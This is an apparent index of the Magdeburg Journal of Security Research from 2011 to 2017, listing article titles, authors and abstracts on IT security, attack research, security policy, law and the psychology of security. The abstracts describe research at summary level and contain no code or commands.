All Issues of the Magdeburg Journal of Security Research

Issue 1, Year 1, Volume 1, 2011

  • The Psychological Foundations of Social Engineering (Die psychologischen Grundlagen des Social Engineerings)
    Stefan Schumacher
    Social engineering is an attack strategy that does not choose technology as its victim. Instead it targets, far more readily and above all more efficiently, the human being and their behaviour. This article shows how social engineering works and explains the underlying tricks on the basis of social-psychological studies and experiments. It also presents examples, warning signs and countermeasures. It is aimed at security officers and system administrators who want to understand how social engineering works and to integrate this knowledge into their security measures.
  • The European Security Strategy 2003: Europe's Attempt to Position Itself as an Independent Security Policy Actor (Essay) (Die Europäische Sicherheitsstrategie 2003. Europas Versuch einer Positionierung als eigenständiger sicherheitspolitischer Akteur)
    Jan W. Meine
    This essay examines the European Security Strategy of 2003 and identifies it as Europe's attempt to establish itself as an independent security policy actor. The National Security Strategy of the USA of 2002 serves as a reference point.
  • The Foreign and Peace Policy of the Holy See: A Systematising Overview (Die Außen- und Friedenspolitik des Heiligen Stuhls. Ein systematisierender Überblick)
    Mathias Bethke
    The Vatican fascinates. Films such as „Illuminati“ draw millions into the cinemas, promising as they do a look behind the thick walls of Saint Peter's. Something almost mystical surrounds the Vatican. And yet it is at the same time a very worldly organisation, indeed a political actor, above all on the international stage. The images of the suffering Pope beside the US president resolved on war went around the world. This article presents the foreign and peace policy of the Holy See with particular attention to its institutional as well as theological foundations. Beyond that, the peace-policy practice of the Holy See is illustrated before, finally, against the background of the Vatican's engagement against the Iraq war, a first answer is sought to the question of how powerful the Holy See is.
  • Securely Deleting Data (Daten sicher löschen)
    Stefan Schumacher
    The main task of a system administrator is protecting data and making it available. Yet some data must be securely destroyed again. This is the case, for example, when old computers or storage media are decommissioned or when statutory retention periods have expired. This article shows which methods for secure data deletion exist, what has to be considered for the various storage media, and how to plan data destruction in advance.
  • On Dealing with Insecurity (Über den Umgang mit Unsicherheit)
    Dr. Hubert Feyrer
    Based on the current security situation, the terms »security« and »insecurity« are discussed, and three examples of insecurity are shown. Dealing with insecurity is illustrated by means of practical countermeasures. The conclusion is that security cannot be achieved through a purely technical solution alone.


Issue 2, Year 1, Volume 2, 2011

  • Data Protection, IT Security, Operational Security: Corporate Decisions between Legal Obligation and Operational Necessity (Datenschutz, IT-Sicherheit, Betriebsschutz: Unternehmensentscheidungen zwischen gesetzlichem Zwang und betrieblicher Notwendigkeit)
    Robert Kudrass
    This article deals with the risk of data theft via corporate networks and with how corporations repeatedly fall victim to hacker attacks. An appropriate data security system can decide the survival of a company.
  • The Security Environment of Cyberspace: Dependencies, Actors, Challenges and Perspectives (Sicherheitsumfeld Cyber-Space: Abhängigkeiten, Akteure, Herausforderungen und Perspektiven)
    Felix F. Seidler
    This article addresses the change in security policy in cyberspace, starting from the increasing networking of all electronic devices. State security policy will not remain unaffected by this in the future.
  • Introduction to the Research Field of Covert Channels (Einführung in die Forschungsthematik der verdeckten Kanäle)
    Steffen Wendzel and Jörg Keller
    Covert channels are a technique for uncensored communication that has so far received little attention outside research. At the same time, covert channels carry the danger of unnoticed information loss (data leakage) and of the unnoticed control of botnets. This article first provides an introduction to the topic of covert channels, their risks and their opportunities. It then presents selected techniques for creating covert channels as examples and discusses common countermeasures. The article closes with an overview of newer techniques from recent years.
  • Controlling System Calls with Systrace (Systemcalls mit Systrace steuern)
    Stefan Schumacher
    Systrace enables system calls to be monitored and controlled. To do so it uses policies that are defined for every program used. Based on such a policy, system calls are permitted or denied. Individual system calls can also be executed under different user privileges. It is thus possible to run SETUID programs as an unprivileged user and to execute only specific system calls with root privileges. Systrace therefore allows the implementation of a fine-grained security policy that can even check the arguments of system calls.

Issue 3, Year 2, Volume 1, 2012

  • The EU's Changing Security Architecture: The Planned Parliamentary Oversight of Security and Intelligence Services in the European Union by the European Parliament (Die Sicherheitsarchitektur der EU im Wandel – Die geplante parlamentarische Kontrolle der Sicherheits- und Nachrichtendienste in der Europäischen Union durch das Europa-Parlament)
    Günther K. Weiße
    The Directorate-General for Internal Policies of the EU Commission commissioned a study of the parliamentary oversight of security and intelligence services in the member states of the European Union, carried out by the Geneva Centre for the Democratic Control of Armed Forces (DCAF) and the European Union Institute (EUI). This official, 446-page paper contains a large number of proposals for harmonising the parliamentary oversight of security and intelligence services in the EU. These proposals massively affect the sovereign rights of the nation states in the Union and thus aim in the long term at introducing a security and intelligence service structure under the control of the European Union.
  • IT Security in Public Perception (IT-Sicherheit in der öffentlichen Wahrnehmung)
    Kristin Krüger
    In the German security policy debate, the topic of security in information technology (IT) is taking up ever more space. Especially since Stuxnet, public awareness of this problem area has intensified significantly. This essay analyses the levels at which the topic of IT security is discussed and which opinions the public holds on this complex subject.
  • Anonymity on the Internet (Anonymität im Internet)
    Jens Kubieziel
    The article presents various options for anonymisation on the Internet and shows their historical development.
  • A History of Hacker Culture: Subculture in the Digital Age (Eine Geschichte der Hackerkultur - Subkultur im Digitalen Zeitalter)
    Jens Holze
    From the perspective of educational research, media can be an essential catalyst for our self-image and world view. Using hacker culture as an example, the contribution argues that concrete manifestations of media structures stem from the thinking of people and thus from the values of the culture that created them. In the context of a modern concept of security, the new social spaces of cyberspace also appear to become a challenge for society as a whole.

Issue 4, Year 2, Volume 2, 2012

  • Timeo Danaos et dona ferentes: How Malware Works (Timeo Danaos et dona ferentes: Zur Funktionsweise von Schadsoftware)
    Stefan Schumacher
    Malware of the most varied kinds, from viruses and worms to Trojans, is a serious threat to the security of all IT systems worldwide. This article presents the basic mechanisms and analyses the German »Staatstrojaner« (state Trojan) in more detail.
  • Penetration Testing with Metasploit (Penetrationstests mit Metasploit)
    Michael Kohl
    Every machine reachable from the Internet is sooner or later exposed to attacks. This is regarded as an unavoidable fact, which does not mean, however, that one cannot prepare for such eventualities. One way to do so is by means of so-called »penetration tests«, in which various tools such as the »Metasploit Framework« discussed here are used.
  • Salafist Propaganda on the Internet: From Pure Mission to Global Jihad. The Essential Ideological Differences among the Salafist Currents in Germany (Salafistische Propaganda im Internet. Von der reinen Mission bis zum globalen Jihad - Die wesentlichen ideentheoretischen Unterschiede unter den salafistischen Strömungen in Deutschland)
    Dirk Baehr
    Numerous Salafist groups exist in Germany that have been proselytising for several years. The content of Salafist propaganda, which is spread on the Internet via videos or books, ranges from the purist Salafist thinking of a Hassan Dabbagh to the radical militant propaganda of Eric Breininger. This essay presents the various currents and points out that among the Salafists in Germany there are both purely missionary groups and militant groups. Since many Salafists communicate anonymously with their sympathisers on the Internet, there are indications of which Salafist current only pursues mission and which propagates global jihad. The propaganda offers one of the few ways of distinguishing the jihadi-Salafist current from the other currents, since so far there is only little openly accessible German-language material that reveals or makes clear the militant intention. The activities of German Salafists on the Internet are analysed using the three-part typology of Salafism developed by the American political scientist Quentin Wiktorowicz.
  • Secure User Authentication for Sensitive IT Systems (Sichere Benutzer-Authentifikation an sensiblen IT-Systemen)
    Frank Hofmann
    A wide variety of technical devices and services require credentials to authenticate an authorised user. As a rule, these credentials consist of a user name and a password. This article presents alternative options such as eToken, smartcards and mTAN.
  • On Cyber War: Is There a War on the Internet? (Vom Cyber-Kriege. Gibt es einen Krieg im Internet?)
    Stefan »Kaishakunin« Schumacher
    This contribution examines the question of whether a war in cyberspace is possible. To do so I rely on the definition of war established by Clausewitz and apply it to the current cyberwar discussion. I present the current technical possibilities for cyberattacks in a brief overview and show how the spread of technology opens up attack vectors for cyberattacks. I also show what influence the current development has on military strategies.
  • Attacks and Defence Strategies for Confidential Communication over Radio Services (Angriffe und Verteidigungsstrategien für vertrauliche Kommunikation über Funkdienste)
    Michael "MiKa" Kafka and René "Lynx" Pfeiffer
    This document serves as a summary, with references to further sources, of the talk "Angriffe und Verteidigungsstrategien für vertrauliche Kommunikation über Funkdienste", given at the 9th ICT Security Seminar of the Austrian Abwehramt. It contains a compilation of various talks from recent DeepSec conferences as well as additions from research results published in the meantime.
  • A DIN Standard for IT Security? (Eine DIN für IT-Sicherheit?)
    Dr. Hubert Feyrer
    An overview of central terms as well as existing laws and standards for the field of IT security is given. This is followed by a presentation of information security management according to ISO 27001, including consideration of technical and organisational measures, but also of the integration of the human factor and the management of risks. It is shown that what is at hand here is not merely a DIN standard for IT security but an international standard that covers all areas of information security.

Issue 5, Year 3, Volume 1, 2013

  • Editorial (In eigener Sache)
    Stefan Schumacher and Jörg Sambleben
    Editorial for the new issue.
  • Security through Freedom and Openness? A Case Study (Sicherheit durch Freiheit und Offenheit? - Ein Fallbeispiel)
    Dr. Hubert Feyrer
    After the definition of central terms, the NetBSD project is presented together with its governance and its processes for development and security. The processes and their results are measured, and the question of whether security through freedom and openness is possible is answered on the basis of the project at hand.
  • On Cyber Peace (Vom Cyber-Frieden)
    Stefan »Kaishakunin« Schumacher
    The article describes the first draft of a strategy for global cyber security. I place a particular emphasis on the capacity to act of the actors involved and on the underlying psychological research.
  • Future Scope for Action in the Genesis of »Security Technologies« (Zukünftige Handlungsspielräume in der Genese von »Sicherheitstechnologien«)
    Simon Runkel and Jürgen Pohl
    According to political directives, the development of new technologies is meant to open up new scope for action for a safer and freer life of citizens in the future. Technology is not neutral, because social practices change and exert great influence on the future organisation of our lives. Security technologies, such as the evacuation assistant discussed as an example, share a predictive functionality intended to ward off potential dangers. The expectation of future dangers is thus inherent in security technologies. On the basis of a post-phenomenological, ethnographic description, the process of a high-tech development is captured and critically examined. Drawing on Heidegger's philosophy of technology as read by Don Ihde, both the politically normalising and the useful dimension of technical action are considered. Alongside the analysis of the efficacy of technical developments, the use of guiding images and prescriptions in the genesis of technology is also critically examined. Finally, a conceptual turn from security to care is attempted, which ultimately connects with a future vision of technical action within the horizon of the hope for a democratic, communal coexistence.

Issue 6, Year 3, Volume 2, 2013

  • Why Android SSL was downgraded from AES256-SHA to RC4-MD5 in late 2010
    Dr. Georg Lukas
    Android is using the combination of broken RC4 and MD5 as the first default cipher on all SSL connections. This impacts all apps that did not change the list of enabled ciphers (i.e. almost all existing apps). This paper investigates why RC4-MD5 is the default cipher, and why it replaced better ciphers which were in use prior to the Android 2.3 release in December 2010.
  • How Bluetooth may jeopardize your privacy. An analysis of people's behavioral patterns in the street.
    Verónica Valeros and Sebastián García
    Cell phones have become so personal that detecting them on the street means detecting their owners. By using the information of the phone along with its GPS position it is possible to record and analyze the behavioral patterns of the people in the street. Bluetooth devices are ubiquitous, but until recently there were no tools to perform Bluetooth wardriving with GPS position and behavioral analysis. A new tool called Bluedriving is presented for doing this type of Bluetooth wardriving. Also, most people are not aware that their Bluetooth device allows their privacy to be abused. The Bluedriving tool can visualize the devices on a map and set different alerts to follow people in the street. The tool is presented along with a large capture dataset and a deep privacy analysis. We conclude that it is possible to follow people in the street by detecting their Bluetooth device.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • Review of »Schluss mit Cybermobbing! Das Trainings- und Präventionsprogramm ›Surf-Fair‹« by Stephanie Pieschl and Torsten Porsch (Rezension zu Schluss mit Cybermobbing!)
    Jens Holze
    A review of »Schluss mit Cybermobbing!« (»Stop Cyberbullying!«).
  • Design and Implementation of an IPv6 Plugin for the Snort Intrusion Detection System
    Martin Schütte
    This work describes the implementation and use of a preprocessor module for the popular open source Intrusion Detection System Snort that detects attacks against the IPv6 Neighbor Discovery Protocol. The implementation utilizes the existing preprocessor APIs for the extension of Snort and provides several new IPv6-specific rule options that can be used to define IPv6 related attack signatures. The developed module is aimed at the detection of suspicious activity in local IPv6 networks and can detect misconfigured network elements, as well as malicious activities from attackers on the network. The plugin's source code is available at https://github.com/mschuett/spp_ipv6

Issue 7, Year 4, Volume 1, 2014

  • Hacking Medical Devices
    Florian Grunow
    In the last few years we have seen an increase of high tech medical devices, including all flavors of communication capabilities. The need of hospitals and patients to transfer data from devices to a central health information system makes the use of a wide range of communication protocols absolutely essential. This results in an increasing complexity of the devices which also increases the attack surface of these devices. We decided to take a look at a few devices that are deployed in many major German hospitals and probably in hospitals around the world. We will focus on the security of these devices and the impact on the patient’s safety. The results will be presented in this talk.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • The IT Continuing Education System and IT Security (Das IT-Weiterbildungssystem und IT-Sicherheit)
    Stefan Schumacher
    Since 1997, the new or reorganised IT vocational training occupations (Fachinformatiker, IT-Systemelektroniker, etc.) have existed, which are intended to impart professional competence in the IT environment. The article presents suitable continuing education measures and advanced training within the framework of the so-called IT continuing education system (IT-Weiterbildungssystem). This includes, among other things, the option of training as a Specialist to become an IT Security Coordinator.

Issue 8, Year 4, Volume 2, 2014

  • Sexy Defense: Maximizing the home-field advantage
    Iftach Ian Amit
    Offensive security is easy, I know. But the goal of offensive security at the end of the day is to make us better defenders. And that’s hard. Usually after the pen-testers/auditors (or worse – red team) leave, there’s a whole lot of mess of vulnerabilities, exposures, threats, risks and wounded egos. Now comes the money time – can you fix this so your security posture will actually be better the next time these guys come around?
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • Social Authentication: Vulnerabilities, Mitigations, and Redesign
    Marco Lancini
    High-value services have introduced two-factor authentication to prevent adversaries from compromising accounts using stolen credentials. Facebook has recently released a two-factor authentication mechanism, referred to as Social Authentication (SA). We designed and implemented an automated system able to break the SA, to demonstrate the feasibility of carrying out large-scale attacks against social authentication with minimal effort on behalf of an attacker. We then revisited the SA concept and proposed reSA, a two-factor authentication scheme that can be easily solved by humans but is robust against face-recognition software.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • An innovative and comprehensive framework for Social Vulnerability Assessment
    Enrico Frumento & Roberto Puricelli
    Nowadays security attacks greatly rely on human vulnerabilities, hence it is fundamental to include the human factor in corporate risk analysis. However, is it possible to evaluate this risk through a specific type of vulnerability assessment? Since 2010, we have been working on the extension of traditional security assessment, going beyond the technology and including the “Social” context. In these years, we assessed several big European enterprises, understanding the impact of these activities on the relations among employees and employer, both from ethical and legal points of view. We developed an innovative methodology for Social Driven Vulnerability Assessments (SDVAs) that we present in this paper beside the early results. As part of their Advanced Threat Protection (ATP) programs, we performed more than 15 SDVAs in big enterprises with a gross number of 12.000 employees; this gave us a first-hand sight of the real vulnerabilities against modern non-conventional security threats.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer

Issue 9, Year 5, Volume 1, 2015

  • Java’s SSLSocket: How Bad APIs Compromise Security
    Dr. Georg Lukas
    Internet security is hard. TLS is almost impossible. Implementing TLS correctly in Java is »Nightmare!«. This paper will show how a badly designed security API introduced over 15 years ago, combined with misleading documentation and developers unaware of security challenges, causes modern smartphone applications to be left exposed to Man-in-the-Middle attacks.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • IPv6 Security: Attacks and Countermeasures in a Nutshell
    Johanna Ullrich, Katharina Krombholz, Heidelinde Hobel, Adrian Dabrowski, Edgar Weippl
    The history of computers is full of underestimation: 640 kilobyte, 2-digit years, and 32-bit Internet addresses. IPv6 was invented to overcome the latter as well as to revise other drawbacks and security vulnerabilities of its predecessor IPv4. Initially considered the savior in terms of security because of its mandatory IPsec support, it turned out not to be the panacea it was thought to be. Outsourcing security to IPsec but eventually removing it as well as other design decisions led to a number of vulnerabilities. They range from the already known spoofing of answers to link-layer address requests to novel possibilities regarding node tracking. In an effort to fix them, a vast amount of updates have been introduced. In this paper, we discuss security and privacy vulnerabilities with regard to IPv6 and their current counter-measures. In a second step, vulnerabilities and countermeasures are systematized by the appliance of an extendible common language for computer security incidents. Our evaluation shows that a large part of vulnerabilities can be mitigated but several security challenges remain. We deduce three main research challenges for IPv6 security, namely address assignment and structure, securing local network discovery, and address selection for reconnaissance. This is a reprint of the authors’ article published in the 8th USENIX Workshop on Offensive Technologies (WOOT), 2014.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • Trusting Your Cloud Provider: Protecting Private Virtual Machines
    Armin Simma
    This article proposes an integrated solution that allows cloud customers to increase their trust into the cloud provider including cloud insiders (e.g. administrators). It is based on Mandatory Access Control and Trusted Computing technologies, namely Measured Boot, Attestation and Sealing. It gives customers strong guarantees about the provider’s host system and binds encrypted virtual machines to the previously attested host.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer

Issue 10, Year 5, Volume 2, 2015

  • Why Anti-Virus Software Fails
    Daniel Sauder
    Based on my work about antivirus evasion techniques, I started using antivirus evasion techniques for testing the effectiveness of antivirus engines. I researched the internal functionality of antivirus products, especially the implementation of heuristics by sandboxing and emulation, and succeeded in evading these.
    One result of my research is a set of tests to check whether a shellcode runs within an x86 emulation engine. One test works by encrypting the payload, which is normally recognized as malicious. When the payload is recognized by the antivirus software, chances are high that x86 emulation was performed.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • The Compromised Devices of the Carna Botnet - As used for the Internet Census 2012
    Parth Shukla
    This article will showcase the latest analysis and the progress of industry collaboration on the problem of Internet facing devices that have default credential logins through telnet. The Carna Botnet, which was used to perform the first-ever map of the Internet – Internet Census 2012 – highlighted a major information security concern with devices that allow default credential login from the Internet by default. For more information on the Internet Census 2012, please refer to the anonymous researcher’s paper.
    A complete list of compromised devices that formed part of the Carna Botnet was obtained exclusively by Parth Shukla. This list is NOT publicly available from any source. This data was acquired directly from the anonymous researcher who performed the Internet Census. As confirmed by the researcher, AusCERT to date remains the only organization and researcher in the world that has the complete dataset. Relevant snippets of this data, however, have been provided to CERTs around the world in order to reduce the threat made explicit by the Carna Botnet.
    This article will provide a detailed analysis of all the different identifying information for each of the compromised devices that formed part of the Botnet. This detailed analysis will showcase the prevalence of easily-exploitable devices in different countries, regions and in different manufacturers. The ultimate aim of this article is to continue to draw public awareness to the larger concerns faced by information security professionals worldwide. Hopefully, this awareness will persuade manufacturers and even local ISPs to collaborate and address this problem. The Carna Botnet reminds us all that there are numerous, simpler vulnerabilities at risk of exploitation and in need of immediate attention.
    The contents of this paper were first released to AusCERT members on 20 August 2013 and to the public on 25 August 2013.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • From Misconceptions to Failure - Security and Privacy in US Cloud Computing FedRAMP Program
    Mikhail Utin, PhD
    This article considers practical implementations of »Cloud Computing« (CC) and associated services (CCS) in the US FedRAMP program, which is expected to convert all the government IT services into »cloud« based ones. We conducted research on how this concept helps to secure information in IT infrastructures. In particular, we were interested to see how it provides security in such a large-scale implementation as the US government FedRAMP program. The following papers were analysed: NIST SP-800-53 R4, NIST SP-800-37 R1, NIST SP-800-144, NIST SP-800-145, NIST SP-800-146 and FedRAMP.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • IT Security Compliance Management can make sense
    Adrian Wiesmann
    What kind of internal and external controls from regulations and other sources are there? What is IT-Risk and IT-Compliance management? Why and for whom does it matter? How can we handle it and how does compliance aggregation fit into the picture?
    We will then look at the SOMAP.org project which is an Open Source project working on tools to handle IT-Compliance aggregation and IT Security compliance management in general. We will discuss why compliance management is not only about hot air but can make sense when done right.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer
  • Psychology of Security - A Research Programme
    Stefan Schumacher
    IT Security is often considered to be a technical problem. However, IT Security is about decisions made by humans and should therefore be researched with psychological methods. Technical/Engineering methods are not able to solve security problems.
    In this talk I will introduce the Institute's research programme about the Psychology of Security. We are going to research the psychological basics of IT security, including: How do people experience IT security? How are they motivated? How do they learn? Why do people tend to make the same mistakes again and again (Buffer Overflow, anyone?)? What can we do to prevent security incidents? Which curricula should be taught about IT security?
    It is based on the 2013 talk »Psychology of Security« and also incorporates parts of my 2014 talk »Security in a Post NSA Age?« held at AUSCert Australia and »Why IT Security is fucked up and what we can do about it« held at Positive Hack Days Moscow.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences“. Edited by Stefan Schumacher and René Pfeiffer

Issue 11, Year 6, Volume 1, 2016

  • IT Security in Water Supply: Protecting Critical Infrastructures (IT-Sicherheit in der Wasserversorgung - Schutz kritischer Infrastrukturen)
    Stefan Schumacher
    Information technology systems are being used in more and more industrial areas, be it classic control engineering systems, SCADA, or Industry 4.0 and the Internet of Things. In water supply, too, automation technology and information technology are gaining ever more importance. Despite their use in this critical infrastructure, IT security frequently does not receive the attention it needs here.
  • Extending a Legacy Platform - Providing a Minimalistic, Secure Single-Sign-On-Library
    Bernhard Göschlberger and Sebastian Göttfert
    Despite decades of security research and authentication standards there is still a vast amount of systems with custom solutions and embedded user databases. Such systems are typically hard to securely integrate with others. We analysed an existing system of an organisation with approximately 12.000 sensitive user data records and uncovered severe vulnerabilities in their approach. We developed a minimal, secure Single-Sign-On-Solution and demonstrated the feasibility of implementing both a minimal Identity Provider and a minimal Service Provider with only a few lines of code. We provided a simple blueprint for an Identity Provider and an easy to use Service Provider Library. Therefore this organisation is now able to integrate arbitrary web based systems. Moreover, others can follow the proposed approach and tailor similar solutions at low cost.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • Civil Society Organisation (CSO) participation in the European Security Research Programme (ESRP)
    Frank Balzer and Christoph Henseler
    As one might expect, the interdisciplinary and multi-accessible area of the ESRP shows a broad variety of actors within its research projects. But, in contradiction to Article 11 of the Lisbon Treaty, CSOs in particular rarely participate as project partners. The following article provides an overview of the participation of CSOs in research projects in the ESRP during the period of the European Union's Seventh Framework Programme for Research (FP7). The data and research were obtained within the FP7 project SecurePART. We have found differences along the lines of geographical regions, the quantity of project participations per country, and the quality of civil society representation of the various kinds of CSOs. These parameters should be taken into account when thinking of rules of representation for future CSO participation in security research on the European level.
    NB: The SecurePART project has received funding from the European Union's Seventh Framework Programme for research, technological development and demonstration under grant agreement no. 608039. The project's website can be found here: http://www.securepart.eu/

Issue 12, Volume 6, Number 2, 2016

  • ZigBee Exploited: The good, the bad and the ugly
    Tobias Zillner
    The Internet of Things (IoT) is an emerging trend. IoT involves the integration of digital and wireless technologies in physical objects and systems, especially those historically unconnected, which are supposed to make our everyday life easy and convenient. One of the most widely used wireless technologies to connect IoT devices is the ZigBee standard. This emerging technology needs to keep pace with customer demands for cheap, long-living and available devices. One of the major challenges besides user and industry acceptance is security. However, security is very often sacrificed or neglected due to fear of reduced or limited usability or fear of breaking backwards compatibility. This paper describes the security measures actually applied in ZigBee, highlights the included weaknesses and introduces a software framework that can be used to automatically audit ZigBee communication and the implementation of ZigBee security services for various vulnerabilities, and to exploit them.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • Bypassing McAfee’s Application Whitelisting for Critical Infrastructure Systems
    René Freingruber
    This paper describes the results of the research conducted by SEC Consult Vulnerability Lab on the security of McAfee Application Control. This product is an example of an application whitelisting solution which can be used to further harden critical systems such as server systems in SCADA environments or client systems with high security requirements like administrative workstations. Application whitelisting is a concept which works by whitelisting all installed software on a system and thereafter preventing the execution of software that is not whitelisted. This should prevent the execution of malware and therefore protect against advanced persistent threat (APT) attacks. McAfee Application Control is an example of such software. It can be installed on any system; however, the main field of application is the protection of highly critical infrastructures. While the core feature of the product is application whitelisting, it also supports additional security features including write- and read-protection as well as different memory corruption protections.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • Applicability of Criminal Law and Jus ad Bellum to Cyber-Incidents
    Oscar Serrano & Florin-Răzvan Radu & Ele-Marit Eomois
    Despite current efforts to adapt existing legal instruments to regulate hostile activities in cyber space, there is uncertainty about the legal situation of actors affected by these actions. Part of this uncertainty is due to the fact that, the cyber domain being technically complex, there is a strong need for collaboration between technical and legal subject matter experts, a collaboration which is difficult to achieve. This paper aims to narrow the gap existing between the legal work in the area and the technical situations that arise during the day-to-day defence of computer networks. With this purpose, it defines a taxonomy of possible cyber-incidents, and analyses the predictable consequences of each type of cyber-incident with the purpose of mapping cyber-incidents to either Jus ad Bellum or criminal law. Not surprisingly, this mapping shows that most cyber operations fall outside Jus ad Bellum and usually amount only to harassment, criminal acts or espionage, and as such they shall be prosecuted using national or international criminal law. The paper identifies the very few cases in which cyber-incidents could theoretically amount to an armed attack (i.e. a cyber-attack).
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • A Death in Athens -- The Inherent Vulnerability of »Lawful Intercept«
    James Bamford
    I will discuss the »Athens Affair,« the subject of a recent investigation by me in The Intercept. In 2004, the NSA and CIA worked secretly with the Greek government to subvert Vodafone and other telecom companies in order to conduct widespread eavesdropping during the 2004 Athens Summer Olympics. The NSA agreed, however, to remove the spyware once the games were over. But rather than remove it, they instead secretly turned it on the top members of the Greek government and members of the Greek public, including journalists.  When the covert operation was accidentally discovered, however, a Vodafone engineer involved was found dead, either by suicide or murder, and the death was officially connected to the bugging operation. I will show how the operation was pulled off, by recruiting an inside person, then subverting the company’s »lawful intercept« program, and transferring the data back to NSA headquarters at Fort Meade. The episode demonstrates the enormous vulnerability of widespread »lawful intercept« programs, and government backdoors in general, and also how the NSA often uses a »bait and switch« in its operations – promising to help find terrorists, but really spying on the host government and local population instead.
    This paper is a transcript of the talk held at DeepSec 2015
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer

Issue 13, Volume 7, Number 1, 2017

  • »Hast du die Sorge nie gekannt?« -- Depth-Psychological Approaches to the Meaning of Anxiety. Theoretical Considerations and Qualitative Interview Analysis.
    Bernd Rieken
    Starting from a quotation from Goethe's »Faust«, the fundamental significance of anxiety from a depth-psychological perspective is pointed out, which may also be of interest for security research. At the same time, the elementary wish for identity and wholeness is discussed as an element that mitigates anxiety; it is closely linked to the satisfaction of intentional, goal-directed needs. The question of how these layers of the personality can be reached in interviews is discussed using the example of field research on the avalanche disaster of Galtür.

    The contribution appears in slightly modified form in: Popp, R.; Rieken, B.; Sindelar, B.: Zukunftsforschung & Psychodynamik. Zukunftsdenken zwischen Angst und Zuversicht. Münster, New York: Waxmann 2017, as chapter 2.2.3 »Zukunftsangst, Risiko und psychodynamische Bewältigungsstrategien«, pp. 18--35.
  • It’s about the administrative costs
    Marcus J. Ranum
    Everything that’s old is new again, and if you work in security long enough, you’ll see the same ideas reinvented and marketed as the new new thing. Or, you see solutions in search of a problem, dusted off and re-marketed in a new niche. I’ll talk about some of that, and make a few wild guesses for where this may wind up. Spoiler alert: security will not be a »solved« problem.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • Malicious Hypervisor Threat -- Phase Two: How to Catch the Hypervisor
    Mikhail Utin, PhD
    In this article we address the matters discussed at DeepSec 2014 (Utin M. 2014) and 2016 (Utin M. 2016), including the current status of the Malicious Hypervisor (MH) project and the available information concerning it. The first part of our research - Phase 1 - was our analysis of a few publicly available documents concerning the MH threat, caused by the exploitation of virtualization and out-of-band management vulnerabilities. The second part - Phase 2 - is about identifying Malicious Hypervisor activity, the discussion of discovery methods and, finally, the testing results of our HyperCatcher MH identification software. The matter of the MH threat is still evolving and we plan to address that in the future in Phase 3. Unfortunately, there is no end to the story of virtualization, vulnerabilities and threats. It started with the implementation of mainframe OS virtualization in a PC environment. The technology was thus transferred from a closed and secure mainframe architecture to an open and diverse Internet world without any thought of possible security implications.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • BadGPO - Using Group Policy Objects for Persistence and Lateral Movement
    Immanuel Willi and Yves Kraft
    Group Policy is a feature which provides centralized management and configuration functions for the Microsoft operating system, application and user settings. Group Policy is simply the easiest way to reach out and configure computer and user settings on networks based on Active Directory Domain Services (AD DS). Such policies are widely used in enterprise environments to control settings of clients and servers: registry settings, security options, scripts, folders, software installation and maintenance, just to name a few. Settings are contained in so-called Group Policy Objects (GPOs) and can be misused in a sneaky way to distribute malware and gain persistence in an automated manner in a post-exploitation scenario of an already compromised domain. In a proof of concept, inspired by Phineas Fisher's article about pwning HackingTeam, we will show how persistence and lateral movement in a compromised company network can be achieved, and demonstrate some PowershellEmpire Framework modules which we created. PowershellEmpire is basically a post-exploitation framework that utilises the widely-deployed PowerShell tool for all your system-smashing needs. There are already functionalities built in regarding GPOs. We tried to further evolve the misuse of GPOs in additional scenarios. Furthermore, we will discuss some countermeasures including detection and prevention mechanisms.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer

Issue 14, Volume 7, Number 2, 2017

  • CSP Is Dead, Long Live CSP! - On the Insecurity of Whitelists and the Future of Content Security Policy
    by Lukas Weichselbaum and Michele Spagnuolo and Sebastian Lekies and Artur Janc
